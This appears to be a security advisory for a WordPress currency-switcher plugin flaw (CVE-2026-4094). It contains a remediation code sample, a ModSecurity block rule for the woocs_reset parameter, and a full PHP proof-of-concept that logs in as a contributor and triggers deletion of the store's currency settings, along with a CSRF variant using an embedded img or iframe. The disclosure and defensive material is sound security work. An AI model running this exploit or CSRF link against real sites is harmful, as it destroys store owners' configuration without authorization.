Atomic Edge analysis of CVE-2026-4094 (metadata-based): This vulnerability in the FOX – Currency Switcher Professional for WooCommerce plugin allows authenticated attackers with Contributor-level access or higher to delete the entire multi-currency configuration. The flaw exists in all versions up to and including 1.4.5. The CVSS score of 8.1 (High) reflects the significant impact on availability and integrity.
The root cause is a Missing Authorization check (CWE-862) in the ‘admin_head’ function. This function likely hooks into WordPress admin page loads and checks for a ‘woocs_reset’ parameter in the URL. Atomic Edge analysis infers that the plugin fails to call current_user_can() or similar capability checks before processing the reset action. The description confirms no nonce verification exists, making it additionally vulnerable to Cross-Site Request Forgery (CSRF). Since no source code is available, these conclusions are based entirely on the CWE classification and vulnerability description.
An attacker with Contributor-level access can exploit this by visiting any WordPress admin page with the ‘woocs_reset’ parameter appended. The specific endpoint is any wp-admin page such as /wp-admin/index.php?woocs_reset=1. The attacker needs to be logged in with Contributor or higher privileges. The lack of a nonce check means an attacker can also craft a CSRF attack against an administrator by tricking them into clicking a malicious link or visiting a crafted page that triggers the reset.
The remediation likely requires adding a capability check (e.g., ‘manage_options’ or a custom capability) to the admin_head function before processing the woocs_reset parameter. Additionally, a nonce check must be implemented to prevent CSRF attacks. Atomic Edge analysis recommends verifying that the patched version 1.4.6 enforces these security controls. Plugin administrators should update to version 1.4.6 immediately.
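The following is an added illustration of the fix the analysis describes, not code from the FOX plugin or from Atomic Edge. It shows the inferred vulnerable pattern next to a hardened handler that adds the capability check and the nonce check. Function names, the option key `woocs_settings`, the nonce action `woocs_reset_settings` and the admin page slug are all assumptions; the plugin's real identifiers are not known from the metadata.

```php
<?php
// Added illustration (hypothetical names; not the plugin's own code).

// BEFORE (inferred pattern, CWE-862): any user who can load a wp-admin page
// triggers the reset simply by appending ?woocs_reset=1 to the URL. There is
// no capability check and no nonce, so it is also reachable via CSRF.
function woocs_reset_settings_vulnerable() {
    if ( isset( $_GET['woocs_reset'] ) ) {
        delete_option( 'woocs_settings' ); // hypothetical option key
    }
}
// Deliberately NOT hooked here; shown only for comparison with the fix below.
// add_action( 'admin_head', 'woocs_reset_settings_vulnerable' );

// AFTER: authorization + CSRF protection before the state change.
function woocs_reset_settings_hardened() {
    if ( ! isset( $_GET['woocs_reset'] ) ) {
        return;
    }

    // Missing Authorization fix: only users who may manage site options.
    // Contributors (and any role without this capability) stop here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'You are not allowed to reset the currency settings.', 'woocs' ),
            '',
            array( 'response' => 403 )
        );
    }

    // CSRF fix: the request must carry a nonce issued for this exact action.
    // check_admin_referer() terminates the request if the nonce is absent,
    // expired, or was generated for another user or another action.
    check_admin_referer( 'woocs_reset_settings', '_wpnonce' );

    delete_option( 'woocs_settings' ); // hypothetical option key

    // Leave the reset URL so a browser reload cannot repeat the action.
    wp_safe_redirect( remove_query_arg( array( 'woocs_reset', '_wpnonce' ) ) );
    exit;
}
// Hooked on admin_init rather than admin_head: admin_init runs before any
// page output, so the redirect header above can still be sent. admin_head
// fires inside <head>, after output has started.
add_action( 'admin_init', 'woocs_reset_settings_hardened' );

// The settings page must link to the reset with a matching nonce, e.g.:
function woocs_reset_settings_link() {
    $page = admin_url( 'admin.php?page=woocs' ); // hypothetical page slug
    return wp_nonce_url(
        add_query_arg( 'woocs_reset', '1', $page ),
        'woocs_reset_settings',
        '_wpnonce'
    );
}
```

With both checks in place, a Contributor who appends `woocs_reset=1` to an admin URL gets a 403 from `current_user_can()`, and a crafted link or image tag aimed at an administrator fails the nonce check because the attacker cannot produce a nonce bound to that administrator's session. Either check alone is insufficient: the capability check does not stop CSRF against an admin, and the nonce check does not stop a low-privileged user who can obtain a nonce from a page they are allowed to view.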
Successful exploitation causes complete deletion of the multi-currency configuration, resulting in data loss and service disruption for e-commerce functionality. The plugin manages currency settings that affect product pricing, currency conversion rates, and display options. Deleting this configuration requires manual reconfiguration, potentially causing incorrect pricing display until restored. This impacts both integrity and availability of the WooCommerce store.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4094 (metadata-based)
# Block exploitation by matching the woocs_reset parameter on wp-admin pages
# This covers both direct authenticated attacks and CSRF scenarios
# Note: the chained directive must be continued with a trailing backslash.
# ARGS_GET matches the query string regardless of the HTTP method, so the
# rule is not restricted to GET; a POST carrying ?woocs_reset=1 in the URL
# would otherwise slip past. The rule also blocks the plugin's own reset
# action for administrators, so remove it once all sites run 1.4.6 or later.
SecRule REQUEST_URI "@rx ^/wp-admin/" \
    "id:20264094,phase:2,deny,status:403,chain,msg:'CVE-2026-4094 FOX Currency Switcher configuration deletion via woocs_reset parameter',severity:'CRITICAL',tag:'CVE-2026-4094'"
    SecRule ARGS_GET:woocs_reset "@rx ^.{1,}$" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4094 - FOX - Currency Switcher Professional for WooCommerce - Missing Authorization to Configuration Deletion
// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'contributor'; // WordPress user with Contributor role or higher
$password = 'password'; // Password for the user
// Initialize cURL
$ch = curl_init();
// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$login_response = curl_exec($ch);
// Check if login was successful (basic check)
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
die('Login failed. Check credentials or target URL.');
}
echo "Authentication successful.\n";
// Step 2: Trigger the vulnerability by visiting any wp-admin page with woocs_reset parameter
// The vulnerability deletes multi-currency configuration when an admin page is loaded with this parameter
$exploit_url = $target_url . '/wp-admin/index.php?woocs_reset=1';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, false); // GET request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exploit_response = curl_exec($ch);
if (curl_error($ch)) {
die('cURL error: ' . curl_error($ch));
}
// Check response HTTP status
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "HTTP Response Code: " . $http_code . "\n";
// Check for success indicators (since no direct output, we rely on the configuration being deleted)
// In a real test, verify by checking if currency switcher settings are empty
if ($http_code == 200 || $http_code == 302) {
echo "Exploit request sent successfully.\n";
echo "Note: The vulnerability triggers silently. Verify by checking if the multi-currency configuration has been deleted.\n";
echo "CSRF variant: An attacker could embed this URL (" . $exploit_url . ") in an img tag or iframe to trick an admin into triggering the reset without visiting the crafted page.\n";
} else {
echo "Exploit request may have failed. Check if the target is vulnerable.\n";
}
// Cleanup
curl_close($ch);
// ===== ALTERNATIVE: Direct reset via admin-ajax.php (if applicable) =====
// If the plugin also exposes an AJAX endpoint, the following could be used
// $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// $ajax_data = array(
// 'action' => 'woocs_reset_config', // Inferred action name
// 'nonce' => '' // No nonce required per vulnerability
// );
// curl_setopt($ch, CURLOPT_URL, $ajax_url);
// curl_setopt($ch, CURLOPT_POST, true);
// curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
// $ajax_response = curl_exec($ch);
?>